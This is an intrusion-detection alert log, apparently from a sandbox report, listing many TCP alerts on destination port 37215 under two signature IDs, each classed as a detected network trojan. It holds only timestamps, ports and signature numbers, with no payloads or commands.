            Timestamp:05/28/24-09:57:11.046166
            SID:2829579
            Source Port:60752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.613078
            SID:2829579
            Source Port:41828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778495
            SID:2835222
            Source Port:45130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.070038
            SID:2835222
            Source Port:37658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052796
            SID:2829579
            Source Port:53454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759788
            SID:2829579
            Source Port:42064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777078
            SID:2829579
            Source Port:43066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645772
            SID:2835222
            Source Port:43152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.308894
            SID:2829579
            Source Port:52708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961341
            SID:2835222
            Source Port:47118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755898
            SID:2829579
            Source Port:38216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342410
            SID:2835222
            Source Port:58460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957209
            SID:2835222
            Source Port:46696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789136
            SID:2829579
            Source Port:43194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687712
            SID:2835222
            Source Port:43624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340030
            SID:2835222
            Source Port:58572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433329
            SID:2835222
            Source Port:36534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298498
            SID:2829579
            Source Port:50528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821819
            SID:2829579
            Source Port:52750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808326
            SID:2835222
            Source Port:47998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864601
            SID:2829579
            Source Port:42280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780170
            SID:2835222
            Source Port:37866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280531
            SID:2835222
            Source Port:54654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776423
            SID:2829579
            Source Port:32952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261571
            SID:2829579
            Source Port:58682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777862
            SID:2835222
            Source Port:45178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.088818
            SID:2829579
            Source Port:45778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984861
            SID:2829579
            Source Port:46710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051312
            SID:2829579
            Source Port:37034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847481
            SID:2835222
            Source Port:40108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277994
            SID:2835222
            Source Port:46054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.668247
            SID:2829579
            Source Port:60344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979582
            SID:2835222
            Source Port:35268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859628
            SID:2829579
            Source Port:46784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.949742
            SID:2835222
            Source Port:43562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542624
            SID:2829579
            Source Port:42350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343674
            SID:2835222
            Source Port:36296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899334
            SID:2829579
            Source Port:36448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809194
            SID:2835222
            Source Port:46942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510047
            SID:2835222
            Source Port:40480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582714
            SID:2829579
            Source Port:42276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560061
            SID:2829579
            Source Port:58498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.722156
            SID:2835222
            Source Port:53336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900645
            SID:2835222
            Source Port:56816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715373
            SID:2829579
            Source Port:51918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817567
            SID:2829579
            Source Port:50554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.927130
            SID:2829579
            Source Port:54114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855380
            SID:2835222
            Source Port:38828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039409
            SID:2835222
            Source Port:43924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470064
            SID:2835222
            Source Port:47510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.070686
            SID:2829579
            Source Port:57004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320038
            SID:2835222
            Source Port:51692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333705
            SID:2835222
            Source Port:49934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778235
            SID:2829579
            Source Port:35254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767562
            SID:2829579
            Source Port:40720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824524
            SID:2829579
            Source Port:38096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777540
            SID:2835222
            Source Port:37800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559428
            SID:2829579
            Source Port:39860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918504
            SID:2835222
            Source Port:60790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300182
            SID:2835222
            Source Port:34842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313293
            SID:2835222
            Source Port:55758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222058
            SID:2835222
            Source Port:52302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433129
            SID:2829579
            Source Port:36250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505857
            SID:2829579
            Source Port:49024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832596
            SID:2829579
            Source Port:45882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744257
            SID:2835222
            Source Port:49474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811135
            SID:2835222
            Source Port:49444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670447
            SID:2835222
            Source Port:42034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543213
            SID:2829579
            Source Port:40328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745224
            SID:2835222
            Source Port:49520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869498
            SID:2835222
            Source Port:40268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744485
            SID:2835222
            Source Port:60556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875050
            SID:2829579
            Source Port:45610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767948
            SID:2835222
            Source Port:55282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493123
            SID:2835222
            Source Port:60598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863102
            SID:2829579
            Source Port:44102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611401
            SID:2829579
            Source Port:35396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298690
            SID:2835222
            Source Port:47838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.490844
            SID:2835222
            Source Port:55140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275672
            SID:2835222
            Source Port:44460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782422
            SID:2829579
            Source Port:52702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809600
            SID:2835222
            Source Port:54088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789477
            SID:2835222
            Source Port:49566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685745
            SID:2829579
            Source Port:38118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.536651
            SID:2829579
            Source Port:47874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778417
            SID:2829579
            Source Port:41444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936295
            SID:2835222
            Source Port:43324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956350
            SID:2835222
            Source Port:49196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966882
            SID:2835222
            Source Port:45674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887829
            SID:2829579
            Source Port:51916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.310233
            SID:2835222
            Source Port:43724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077869
            SID:2835222
            Source Port:59936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855597
            SID:2835222
            Source Port:44908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334286
            SID:2829579
            Source Port:45046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054296
            SID:2829579
            Source Port:37182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860971
            SID:2829579
            Source Port:43824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917320
            SID:2829579
            Source Port:48802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527211
            SID:2835222
            Source Port:43748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685463
            SID:2829579
            Source Port:57684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.110243
            SID:2835222
            Source Port:52888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.835688
            SID:2835222
            Source Port:47314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648735
            SID:2835222
            Source Port:60236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757426
            SID:2829579
            Source Port:52068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561969
            SID:2829579
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870633
            SID:2835222
            Source Port:40210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887528
            SID:2829579
            Source Port:55408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327692
            SID:2829579
            Source Port:33184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506676
            SID:2829579
            Source Port:53958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026589
            SID:2829579
            Source Port:50234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.608128
            SID:2829579
            Source Port:53892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851117
            SID:2829579
            Source Port:34544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934928
            SID:2835222
            Source Port:56724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780036
            SID:2835222
            Source Port:53884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.191212
            SID:2835222
            Source Port:59456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.734058
            SID:2829579
            Source Port:52618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796403
            SID:2835222
            Source Port:34096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979360
            SID:2829579
            Source Port:43754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379891
            SID:2835222
            Source Port:36128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559829
            SID:2829579
            Source Port:60940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855365
            SID:2829579
            Source Port:43220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437308
            SID:2829579
            Source Port:49968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033178
            SID:2829579
            Source Port:53020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756878
            SID:2835222
            Source Port:50934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943817
            SID:2835222
            Source Port:52058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899719
            SID:2835222
            Source Port:47972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912145
            SID:2835222
            Source Port:57442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523631
            SID:2829579
            Source Port:44174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623391
            SID:2835222
            Source Port:39280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825337
            SID:2829579
            Source Port:50558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875148
            SID:2835222
            Source Port:51208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260954
            SID:2829579
            Source Port:60130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000542
            SID:2835222
            Source Port:34112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.419581
            SID:2829579
            Source Port:56386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892097
            SID:2829579
            Source Port:53590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669448
            SID:2835222
            Source Port:34012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.924558
            SID:2829579
            Source Port:34246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437187
            SID:2829579
            Source Port:60216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836551
            SID:2829579
            Source Port:49176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908394
            SID:2829579
            Source Port:59446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872335
            SID:2829579
            Source Port:52466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773909
            SID:2835222
            Source Port:45442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809683
            SID:2835222
            Source Port:55778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803731
            SID:2835222
            Source Port:33790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732888
            SID:2829579
            Source Port:48942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778324
            SID:2829579
            Source Port:57968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860440
            SID:2835222
            Source Port:34444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432324
            SID:2829579
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421412
            SID:2835222
            Source Port:52572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766671
            SID:2835222
            Source Port:57756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412904
            SID:2829579
            Source Port:53504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777087
            SID:2829579
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320119
            SID:2835222
            Source Port:39956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.641453
            SID:2835222
            Source Port:59140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038289
            SID:2829579
            Source Port:53410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675882
            SID:2835222
            Source Port:60796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290946
            SID:2829579
            Source Port:44980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443262
            SID:2835222
            Source Port:46052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043142
            SID:2835222
            Source Port:49466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505802
            SID:2835222
            Source Port:48120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575437
            SID:2835222
            Source Port:40308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.115369
            SID:2829579
            Source Port:38320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646398
            SID:2829579
            Source Port:33328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706599
            SID:2835222
            Source Port:36752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298585
            SID:2829579
            Source Port:41480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552572
            SID:2835222
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004082
            SID:2829579
            Source Port:41262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395835
            SID:2829579
            Source Port:33986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574275
            SID:2835222
            Source Port:44988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738755
            SID:2835222
            Source Port:35196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887489
            SID:2835222
            Source Port:45400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793390
            SID:2835222
            Source Port:58986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728692
            SID:2835222
            Source Port:44806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436907
            SID:2835222
            Source Port:45834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760123
            SID:2835222
            Source Port:38760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863873
            SID:2835222
            Source Port:59334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669886
            SID:2835222
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071282
            SID:2829579
            Source Port:42284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290360
            SID:2835222
            Source Port:55472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918452
            SID:2829579
            Source Port:54476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069052
            SID:2829579
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074273
            SID:2835222
            Source Port:45214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026984
            SID:2835222
            Source Port:49202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860490
            SID:2835222
            Source Port:48642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562839
            SID:2829579
            Source Port:38674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004763
            SID:2835222
            Source Port:46942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280363
            SID:2835222
            Source Port:36900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542444
            SID:2829579
            Source Port:43648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307639
            SID:2835222
            Source Port:34824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727649
            SID:2835222
            Source Port:46492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848874
            SID:2835222
            Source Port:38356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078618
            SID:2829579
            Source Port:47992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277117
            SID:2829579
            Source Port:56366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457561
            SID:2835222
            Source Port:51654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810567
            SID:2829579
            Source Port:60466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809655
            SID:2829579
            Source Port:51394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922782
            SID:2829579
            Source Port:55676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939206
            SID:2829579
            Source Port:43248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884620
